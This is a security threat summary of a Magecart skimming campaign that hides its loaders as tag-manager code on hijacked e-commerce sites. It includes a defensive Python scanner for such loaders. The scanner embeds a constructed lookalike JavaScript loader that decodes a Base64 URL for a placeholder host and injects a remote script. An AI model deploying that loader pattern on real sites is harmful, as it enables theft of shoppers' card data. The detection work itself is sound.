Researchers Spot a Different Kind of Magecart Card-Skimming Campaign

Cyber Security Threat Summary:
A cybercriminal affiliated with the Magecart group has successfully infected an undisclosed number of e-commerce websites across the United States, United Kingdom, and five other countries with malware designed to skim credit card numbers and personally identifiable information (PII) from unsuspecting individuals who engage in online purchases on these platforms. However, a novel twist in this malicious campaign involves the exploitation of the same compromised websites as hosts for distributing the card-skimming malware to other targeted sites. Akamai researchers, who discovered this ongoing operation, emphasize that it not only distinguishes itself from previous Magecart activities but also poses a significantly greater threat. According to their assessment, these cyberattacks have persisted for at least a month, potentially impacting tens of thousands of individuals thus far. In addition to the United States and United Kingdom, Akamai has identified affected websites in Brazil, Spain, Estonia, Australia, and Peru as part of this widespread campaign.

“The latest campaign is slightly different in that the attacker is not just injecting a Magecart card skimmer into target sites but is also hijacking many of them to distribute malicious code. "One of the primary advantages of utilizing legitimate website domains is the inherent trust that these domains have built over time," according to the Akamai analysis. "Security services and domain scoring systems typically assign higher trust levels to domains with a positive track record and a history of legitimate use. As a result, malicious activities conducted under these domains have an increased chance of going undetected or being treated as benign by automated security systems." In addition, the attacker behind the latest operation has also been attacking sites running not just Magento but other software, such as WooCommerce, Shopify, and WordPress” (DarkReading, 2023).

Akamai researcher Roman Lvovsky stated in a blog post that one of the most notable aspects of the campaign is the strategic setup of the attackers' infrastructure to carry out the web skimming operation. Prior to launching the campaign, the attackers actively search for vulnerable websites to serve as "hosts" for the malicious code that will be utilized later in the web skimming attack. Akamai's analysis of the campaign revealed the implementation of various tactics by the attacker to obscure the malicious activity. Instead of directly injecting the skimmer into the targeted website, the attacker employed a small JavaScript code snippet within the webpages, which subsequently fetched the malicious skimmer from a host website. To make detection challenging, the attacker designed the JavaScript loader to resemble legitimate third-party services such as Google Tag Manager and Facebook Pixel tracking code. Additionally, the operator of this ongoing Magecart-like campaign leveraged Base64 encoding to conceal the URLs of compromised websites hosting the skimmer. Akamai also discovered code within the skimmer malware that prevented the duplicate theft of credit card and personal information.
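As an added illustration (not code from the Akamai report or the DarkReading article), the following Python script shows one way a defender could triage a page's inline scripts for the loader pattern described above: a snippet shaped like the Google Tag Manager bootstrap that hides the real script URL in a Base64 literal and points at a host outside the site's own allowlist. Both sample scripts, the allowlist, and the host name compromised-shop.example are constructed for this example and are not indicators from the campaign.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts this hypothetical shop expects scripts to load from.
TRUSTED_HOSTS = {"shop.example", "www.googletagmanager.com", "connect.facebook.net"}

# Constructed sample 1: a genuine-looking Google Tag Manager bootstrap snippet.
LEGIT_GTM = """
(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';
j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXXX');
"""

# Constructed sample 2: same shape, but the script URL is a Base64 literal decoded at
# runtime and points at a placeholder "host" domain instead of Google's.
_HIDDEN_URL = "https://compromised-shop.example/img/tag.js"  # placeholder, not a real IoC
_ENCODED = base64.b64encode(_HIDDEN_URL.encode()).decode()
LOOKALIKE_LOADER = f"""
(function(w,d,s,l,i){{w[l]=w[l]||[];
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);
j.async=true;j.src=atob('{_ENCODED}');f.parentNode.insertBefore(j,f);
}})(window,document,'script','dataLayer','GTM-XXXXXXX');
"""

# Constructed page embedding both snippets.
SAMPLE_HTML = (
    f"<html><head><script>{LEGIT_GTM}</script></head>"
    f"<body><script>{LOOKALIKE_LOADER}</script></body></html>"
)


def extract_inline_scripts(html: str) -> list[str]:
    """Return the bodies of inline <script> elements (external src files are not fetched)."""
    return re.findall(r"<script[^>]*>(.*?)</script>", html, flags=re.S | re.I)


def find_encoded_urls(script: str) -> list[str]:
    """Decode quoted Base64-looking literals and keep the ones that turn into URLs."""
    urls = []
    for m in re.finditer(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""", script):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64 or not text: ignore
        if decoded.startswith(("http://", "https://", "//")):
            urls.append(decoded)
    return urls


def find_literal_urls(script: str) -> list[str]:
    """Plain http(s) URLs written directly in the script text."""
    return re.findall(r"""https?://[^\s'"]+""", script)


def analyze_script(script: str, trusted_hosts: set[str] = TRUSTED_HOSTS) -> list[dict]:
    """Heuristic triage of one inline script; returns a list of findings (empty = nothing seen)."""
    findings = []
    encoded = find_encoded_urls(script)
    for url in encoded:
        findings.append({"kind": "base64_url", "url": url})
    # Any script source, literal or decoded, whose host is not on the allowlist.
    for url in find_literal_urls(script) + encoded:
        host = urlparse(url).hostname or ""
        if host not in trusted_hosts:
            findings.append({"kind": "untrusted_host", "host": host, "url": url})
    # Tag Manager look and feel without actually loading from Google's tag host.
    looks_like_gtm = "dataLayer" in script or "GTM-" in script
    loads_from_gtm = any(
        urlparse(u).hostname == "www.googletagmanager.com" for u in find_literal_urls(script)
    )
    if looks_like_gtm and not loads_from_gtm:
        findings.append({"kind": "tag_manager_lookalike"})
    return findings


def scan_page(html: str, trusted_hosts: set[str] = TRUSTED_HOSTS) -> list[list[dict]]:
    """Findings per inline script, in document order."""
    return [analyze_script(s, trusted_hosts) for s in extract_inline_scripts(html)]


if __name__ == "__main__":
    for i, findings in enumerate(scan_page(SAMPLE_HTML)):
        status = "clean" if not findings else ", ".join(f["kind"] for f in findings)
        print(f"inline script #{i}: {status}")
```

Run against the constructed page, the genuine snippet produces no findings while the lookalike is flagged three ways (Base64-hidden URL, untrusted host, tag-manager lookalike). This is a static triage heuristic for periodic crawls of your own checkout pages; it does not replace the in-browser monitoring of sensitive-field reads and exfiltration that the Akamai recommendations below describe, and an allowlist that is too broad will let a loader on a trusted-but-compromised domain through.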

Security Officer Comments:
According to Akamai, there were a total of 9,200 Magecart attacks on e-commerce sites in the previous year, with 2,468 sites remaining infected by the end of 2022. These groups typically carry out their operations by discreetly injecting malicious code into legitimate e-commerce websites or exploiting vulnerabilities in third-party components like trackers and shopping carts. When users input their credit card details and other sensitive information on compromised websites' checkout pages, the skimming malware secretly intercepts and sends the data to a remote server. Up until now, Magecart attacks have primarily targeted websites using the open-source Magento e-commerce platform. The latest campaign showcases a slight variation, as the attacker not only injects Magecart card skimmers into targeted sites but also takes control of numerous sites to distribute malicious code.

Suggested Correction(s):
Researchers at Akamai recommend the following:

“To plant a web skimmer, attackers will need to get initial access to the server either by exploiting a vulnerability or by abusing one of the existing third-party scripts. To prevent this initial access to the server, security practitioners are advised to keep up with the most recent patches and complement them by implementing a WAF. However, the complexity, deployment, agility, and distribution of current web application environments — and the various methods attackers can use to install web skimmers — require more dedicated security solutions, which can provide visibility into the behavior of scripts running within the browser and offer defense against client-side attacks. An appropriate solution must move closer to where the actual attack on the clients occurs. It should be able to successfully identify the attempted reads from sensitive input fields and the exfiltration of data (in our testing we employed Akamai Page Integrity Manager). We recommend that these events are properly collected in order to facilitate fast and effective mitigation.”

IOCs:
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains

Source: https://www.darkreading.com/attacks-breaches/different-kind-magecart-card-skimming-campaign
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains